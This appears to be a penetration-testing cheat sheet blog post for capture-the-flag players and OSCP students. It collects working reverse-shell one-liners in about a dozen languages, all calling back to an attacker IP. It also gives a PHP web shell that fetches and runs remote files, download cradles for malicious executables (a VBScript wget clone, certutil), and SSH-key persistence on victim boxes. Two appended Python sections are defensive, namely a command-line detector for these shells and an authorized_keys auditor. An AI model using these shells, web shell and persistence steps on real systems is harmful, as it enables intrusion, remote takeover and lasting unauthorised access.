The ultimate reverse shell, file transfer and persistence collection
She sells sea shells by the sea shore
If you are taking part in capture the flag competitions, the OSCP (like me), or are lucky enough to get a shell on a victim box during an active penetration test engagement, here is a list of useful one-liner reverse shells. Be warned: as I started writing this post it became slightly more than just reverse shells, and it now includes file transfer methods as well, since you will usually want to do both.
I will be actively adding to this list so feel free to bookmark or contribute.
AWK Reverse shell
awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Socat Reverse shell
# Attack box
socat file:`tty`,raw,echo=0 tcp-listen:4444
# Victim box (interactive TTY shell)
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4444
Powershell Reverse shell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("ip-address",port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Bash Reverse shell
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl Reverse shell
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python Reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP Reverse shells
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Simple PHP shell to fetch a file onto the server and then execute it
<?php
// Fetch a file from the attacker's HTTP server and write it under the same name on this host.
if (isset($_REQUEST['fupload'])) {
    file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.0.0.1:1234/" . $_REQUEST['fupload']));
}
// Run a command and return its output in the response.
if (isset($_REQUEST['fexec'])) {
    echo shell_exec($_REQUEST['fexec']);
}
Ruby Reverse shell
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat Reverse shell
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
# Upgrade to a TTY shell (can be used with most of these commands; personally I use it most often with netcat)
python -c 'import pty; pty.spawn("/bin/bash")'
Java Reverse shell
// Groovy syntax (e.g. a Jenkins script console): untyped assignment and the "as String[]" cast are not valid plain Java.
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Groovy Reverse shell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Python local server / file transfer
Because once you get a shell you usually want to get something up there, Python is my usual go-to for spinning up a quick server to wget a file from (assuming your IP is 192.168.0.10 and you have a file called malicious.sh in the folder you started the Python server from).
# <= Python 2
python -m SimpleHTTPServer 8000
# >= Python 3
python3 -m http.server 8000
Then retrieve the file using wget on Linux:
wget http://192.168.0.10:8000/malicious.sh
Or on Windows, which doesn't have wget, you need to create a Visual Basic script that does the same (the old/OSCP way; see CertUtil below). Copy and paste this into a terminal, and be sure to press Enter one more time to execute the last line and actually write the script to the system.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
# then still on the victim machine use cscript to execute the vbscript "wget.vbs" to download the file:
cscript wget.vbs http://192.168.0.10:8000/malicious.exe malicious.exe
Or, if possible, save yourself some hassle and “live off the land” with this slick one-liner: you can use certutil to download files (source):
certutil -urlcache -f http://192.168.0.10:8000/malicious.exe malicious.exe
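A detection-side counterpart to the reverse shells and the download cradles above, added here as an example and not part of the original post: it runs regex rules keyed on the structural parts of these one-liners (the /dev/tcp pseudo-device, the fifo-to-nc pipe, dup2 onto a shell, the pty upgrade, certutil -urlcache, TCPClient plus GetStream) over constructed sample process command lines. The hostnames, user names and rule names are my assumptions.

```python
import re

# Constructed sample process-creation events (host, user, command line); not real telemetry.
# The first seven reuse command shapes from this page; the last three are benign look-alikes.
SAMPLE_EVENTS = [
    ("web01", "www-data", "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"),
    ("web01", "www-data", "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f"),
    ("web01", "www-data", "nc -e /bin/sh 10.0.0.1 1234"),
    ("web01", "www-data", "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
                          "s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0);p=subprocess.call([\"/bin/sh\",\"-i\"])'"),
    ("web01", "www-data", "python -c 'import pty; pty.spawn(\"/bin/bash\")'"),
    ("ws07", "alice", "certutil -urlcache -f http://192.168.0.10:8000/malicious.exe malicious.exe"),
    ("ws07", "alice", "powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object "
                      "System.Net.Sockets.TCPClient(\"10.0.0.1\",4444);$stream = $client.GetStream()"),
    ("web01", "deploy", "python3 -m http.server 8000"),
    ("web01", "deploy", "wget https://example.org/release.tar.gz"),
    ("ws07", "alice", "certutil -verify cert.cer"),
]

# Each rule is (name, compiled regex). Patterns key on the structural parts of the one-liners
# rather than on a specific IP or port, which an attacker changes freely.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("netcat_exec_or_fifo", re.compile(r"\bnc\b.*\s-e\s|mkfifo\s+\S+.*\|\s*nc\b")),
    ("socket_dup2_shell", re.compile(r"socket\.socket\(.*dup2.*/bin/(?:ba)?sh")),
    ("pty_upgrade", re.compile(r"pty\.spawn\(")),
    ("certutil_urlcache", re.compile(r"certutil(?:\.exe)?\s+-urlcache\s+(?:-split\s+)?-f\s+https?://", re.I)),
    ("powershell_tcpclient", re.compile(r"Net\.Sockets\.TCPClient.*GetStream", re.I)),
]


def match_rules(cmdline):
    """Return the names of every rule whose pattern occurs in the command line."""
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def scan(events):
    """Return one alert dict per event that matched at least one rule, in input order."""
    alerts = []
    for host, user, cmdline in events:
        hits = match_rules(cmdline)
        if hits:
            alerts.append({"host": host, "user": user, "rules": hits, "cmdline": cmdline})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert['host']}\t{alert['user']}\t{','.join(alert['rules'])}\t{alert['cmdline'][:60]}")
```

Feed it process-creation telemetry (auditd execve records, Sysmon event ID 1); the pty_upgrade rule also fires on legitimate admin tooling that spawns interactive shells, so scope it to web and service accounts.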
Rsync’ing files/folders between Linux servers.
Not necessarily a reverse shell, but a quick and dirty method that's useful for transferring files between servers once a foothold has been attained.
# attack box
ssh-keygen -t rsa -b 4096 -C "[email protected]" -f ~/.ssh/id_rsa_hacker
# attack box (set correct permissions on the private key)
chmod 600 ~/.ssh/id_rsa_hacker
# cat and copy the contents of your new SSH public key (id_rsa_hacker.pub), then switch to the victim box and append it to the end of ~/.ssh/authorized_keys for the target user.
cat ~/.ssh/id_rsa_hacker.pub
You can now ssh freely one way (provided everything went smoothly); for two-way access, repeat the process in the other direction.
# To upload any file or folder use the following, changing _PORT_/_FILE2TRANSFER_/_VICTIM_USER_/_VICTIM_IP_ etc. as needed
rsync -rvz -e 'ssh -p _PORT_ -i ~/.ssh/id_rsa_hacker' --progress _FILE2TRANSFER_ _VICTIM_USER_@_VICTIM_IP_:~/
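The defender's check for the SSH key persistence just described, added as an example and not part of the original post: it parses an authorized_keys file, fingerprints each key the way ssh-keygen -lf does (SHA256 over the decoded blob), and flags entries missing from an inventory of issued keys. The sample file, its placeholder key blobs (valid base64, not real keys) and the inventory are constructed.

```python
import base64
import binascii
import hashlib
import shlex

# Constructed sample authorized_keys file: the key blobs are placeholders that decode as base64
# but are not real keys. Line 4 is the kind of entry the rsync/ssh trick above leaves behind.
SAMPLE_AUTHORIZED_KEYS = """\
# provisioned by configuration management
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEKEY0001 deploy@ci
from="10.1.2.0/24",no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQFAKEKEY002 backup@bastion
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQFAKEKEY003 hacker@attack-box
"""

# Inventory of key blobs the organisation actually issued (here: the first two entries above).
ALLOWED_BLOBS = {"AAAAC3NzaC1lZDI1NTE5AAAAIFAKEKEY0001", "AAAAB3NzaC1yc2EAAAADAQABAAABAQFAKEKEY002"}

KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def parse_entry(line):
    """Split one authorized_keys line into (options, keytype, blob, comment); None for blanks and comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    tokens = shlex.split(line)  # keeps an options list such as from="...",no-pty as one token
    for i, tok in enumerate(tokens):
        if tok in KEY_TYPES and i + 1 < len(tokens):
            return (" ".join(tokens[:i]), tok, tokens[i + 1], " ".join(tokens[i + 2:]))
    raise ValueError("no recognised key type: " + line)


def fingerprint(blob):
    """OpenSSH-style SHA256 fingerprint of a base64 key blob (same format as ssh-keygen -lf)."""
    raw = base64.b64decode(blob, validate=True)
    return "SHA256:" + base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")


def audit(text, allowed_blobs):
    """Return findings (lineno, reason, comment, fingerprint) for entries that are not in the inventory."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        try:
            entry = parse_entry(line)
            if entry is None:
                continue
            _options, _keytype, blob, comment = entry
            fp = fingerprint(blob)
        except (ValueError, binascii.Error):
            findings.append((lineno, "malformed", line[:40], None))
            continue
        if blob not in allowed_blobs:
            findings.append((lineno, "unknown_key", comment, fp))
    return findings
```

Run it over every user's authorized_keys (and the root account's) from a cron job or configuration management check; the reported fingerprint is what to compare against your key inventory and against the output of ssh-keygen -lf on the issued public keys.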